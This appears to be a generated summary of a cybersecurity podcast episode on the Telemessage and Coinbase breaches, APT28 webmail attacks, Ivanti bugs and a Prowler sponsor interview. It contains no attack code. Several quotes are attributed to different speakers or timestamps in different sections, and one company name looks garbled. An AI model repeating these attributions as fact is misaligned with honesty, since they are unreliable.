Risky Business #792 Summary: "Beware, Coinbase Users. Crypto Thieves Are Taking Fingers Now"

Release Date: May 21, 2025
Host: Patrick Gray
Guest: Adam Boileau
Sponsor: Tony De la Fuente, Founder of Prowler

Introduction

In episode #792 of Risky Business, host Patrick Gray engages in an in-depth discussion with Adam Boileau, dissecting the latest developments in cybersecurity. The episode delves into significant breaches affecting major platforms like Telemessage and Coinbase, explores the evolving tactics of cyber adversaries, and examines the implications of these incidents on both individuals and organizations. Additionally, the episode features an insightful interview with Tony De la Fuente from Prowler, highlighting advancements in cloud security tools.

Telemessage Data Leak via DDoS Secrets

The episode kicks off with alarming news about DDoS Secrets, a leak site operated by Emma Best, which reportedly obtained 400 gigabytes of heap dumps from Telemessage's message archiving servers.

• Patrick Gray [00:00]: Introduces the issue, stating, “DDoS secrets... got its hands on 400 gig of like heap dumps from Telemessage’s message archiving servers.”

• Adam Boileau [01:28]: Explains the technical breach: “The Telemessage backend is written in Java and they're using the Spring Boot framework... somebody found this with a brute forcer and just started scraping memory every few minutes.”

  The breach was facilitated by an unsecured endpoint in an older version of Spring Boot that allowed unauthorized access to heap dumps, containing sensitive information such as credentials and message content.

• Patrick Gray [03:51]: Criticizes Telemessage’s flawed password handling: “They’re doing client-side MD5 hashing of passwords, then submitting the hash, so... you just use that to log in with.”

This vulnerability not only exposed sensitive communications but also highlighted poor security practices, making it trivial for attackers to breach the system and access confidential data.

Implications:

• Government Exposure: The leaked data includes messages from government agencies like Customs and Border Protection, raising concerns about national security.

• Technical Oversight: The incident underscores the critical importance of securing backend systems and properly configuring frameworks to prevent unauthorized access.

Coinbase Breach and Its Implications

A significant portion of the episode focuses on a disturbing incident involving Coinbase, a leading cryptocurrency exchange.

• Patrick Gray [07:00]: Details the breach: “An overseas-based Coinbase support agent was cooperating with some sort of threat actor and handing over customer data to some extortionist.”

• Adam Boileau [09:27]: Highlights the severity: “The hash is the password... This information is everything that a thief would need... account balances.”

Coinbase faced a formidable challenge when a compromised support agent facilitated the unauthorized access and attempted extortion of customer data. The breach potentially exposed sensitive information, including names, addresses, and account balances of users, making high-net-worth individuals ("whales") prime targets for further malicious activities.

• Violent Repercussions: The discussion touches on violent crimes linked to data breaches, such as the attempted abduction of a Paymarium executive’s daughter, emphasizing the real-world dangers of cyber extortion.

GovDelivery Email System Compromise

The conversation shifts to a breach affecting GovDelivery, an email alert system utilized by various government agencies.

• Patrick Gray [14:37]: Summarizes the incident: “Someone got their account compromised and it was being used to send scam messages.”

• Adam Boileau [15:54]: Analyzes the attack vector: “Either phished or info stealer.”

The compromise allowed attackers to send fraudulent communications leveraging government credibility, enhancing the legitimacy of their scams and increasing the likelihood of successful phishing attempts.

Telegram’s Actions Against Blackmarket Services

Telegram has recently taken steps to curb illicit activities on its platform.

• Patrick Gray [17:14]: Notes Telegram's crackdown: “Blocked a couple of massive black market services... released a transparency report.”

• Adam Boileau [17:14]: Adds specifics: “[They] blocked WeDo Guarantee and Zinbi Guarantee, major fronts for money laundering.”

Despite these efforts, Telegram faces criticism for its handling of other issues, such as alleged censorship pressures related to the Romanian election and its stance during geopolitical tensions, particularly concerning Russia.

Cross-Site Scripting Attacks from APT28 (Fancy Bear)

Adam Boileau discusses a sophisticated campaign by APT28, also known as Fancy Bear.

• Adam Boileau [19:45]: Describes the attack: “They were setting up mail forwarding rules to send your email off to the Kremlin for ingest into their intelligence pipeline.”

Targeting open-source webmail platforms like Roundcube, Horde, and Zimbra, these attacks exploit vulnerabilities to steal and forward emails, thereby infiltrating sensitive communications of targeted organizations, including governments in Africa, the EU, and South America.

Tax Fraud in Australia Through MyGov Compromises

The episode highlights emerging tax fraud tactics in Australia.

• Patrick Gray [21:27]: Reports on increased fraudulent tax returns: “Based on people getting their MyGov accounts compromised.”

• Adam Boileau [22:10]: Connects the dots: “These are transferable ways to turn personal information... into something monetizable.”

While currently limited in scale, the potential for widespread tax fraud leveraging compromised government accounts poses a significant threat to personal finances and national revenue systems.

High-Profile Cases: Eric Council Jr. and Power School Breach

Two notable cases underscore the personal and organizational impacts of cybersecurity breaches.

1. Eric Council Jr.:

   • Patrick Gray [23:03]: Explains the incident: “He was paid $50K to perform a SIM swap and take over the SEC’s Twitter account, causing temporary bitcoin price fluctuations.”

   • Adam Boileau [24:04]: Discusses the sentencing: “He was sentenced to 14 months in prison and ordered to forfeit the $50K.”

2. Power School Breach:

   • Patrick Gray [25:19]: Details the breach: “Matthew Lane, a 19-year-old, compromised Power School accounts, affecting data on approximately 60 million children.”

   • Adam Boileau [26:11]: Comments on the sentencing: “He’s looking at something like nine years over this thing.”

These cases illustrate the severe legal consequences of cybercrimes and the extensive damage inflicted on victims, ranging from financial losses to the exposure of sensitive personal data.

Ivanti Vulnerabilities and Their Exploits

The discussion transitions to another critical security issue involving Ivanti.

• Adam Boileau [34:31]: Outlines the vulnerabilities: “There was a bug chain being exploited to compromise Ivanti Endpoint management platforms...”

• Patrick Gray [36:05]: Criticizes Ivanti’s response: “They're not going to tell you which one... it’s like an AUTH bypass if there's no auth.”

The exploitation of open-source components like Hibernate Validator by Ivanti led to unauthorized access and potential execution of malicious code, highlighting the risks associated with third-party dependencies and misconfigurations.

Sponsor Spotlight: Prowler's Latest Releases

In the sponsored segment, Patrick Gray interviews Tony De la Fuente, founder of Prowler, an open-source cloud security platform.

• Tony De la Fuente [38:50]: Announces the release of Prowler 5.6 and introduces new tools, Prowler Hub and Prowler Studio, enhancing cloud security monitoring and compliance checks across various platforms, including Microsoft 365.

• Patrick Gray [43:04]: Emphasizes the value: “Instead of just some weird check... Prowler Hub explains what it is.”

• Tony De la Fuente [44:14]: Highlights the integration with AI in Prowler Studio: “Prowler Studio understands that using AI and creates the code for you... you can create your own custom checks.”

These tools aim to streamline cloud security management, offering both command-line and user-friendly interfaces to ensure robust security postures across diverse cloud environments.

Conclusion

Episode #792 of Risky Business provides a comprehensive overview of current cybersecurity challenges, from data breaches and cyber extortion to sophisticated state-sponsored attacks. The discussions emphasize the critical need for robust security practices, vigilant oversight of third-party dependencies, and the proactive development of security tools. The interview with Prowler underscores the community-driven efforts to enhance cloud security, offering valuable resources for professionals aiming to safeguard their infrastructures.

Listeners are encouraged to stay informed, adopt best security practices, and leverage advanced tools like Prowler to navigate the ever-evolving landscape of information security.

Notable Quotes:

• Patrick Gray [01:02]: “DDoS secrets... got its hands on 400 gig of like heap dumps from Telemessage’s message archiving servers.”

• Adam Boileau [03:51]: “They’re doing client-side MD5 hashing of passwords, then submitting the hash, so... you just use that to log in with.”

• Patrick Gray [07:00]: “This information is everything that a thief would need... account balances.”

• Adam Boileau [14:37]: “Either phished or info stealer.”

• Patrick Gray [32:44]: “These are people who you don't really want them being victimized again.”

• Tony De la Fuente [44:14]: “Prowler Studio understands that using AI and creates the code for you.”

For more detailed discussions and the latest in information security, tune into Risky Business weekly.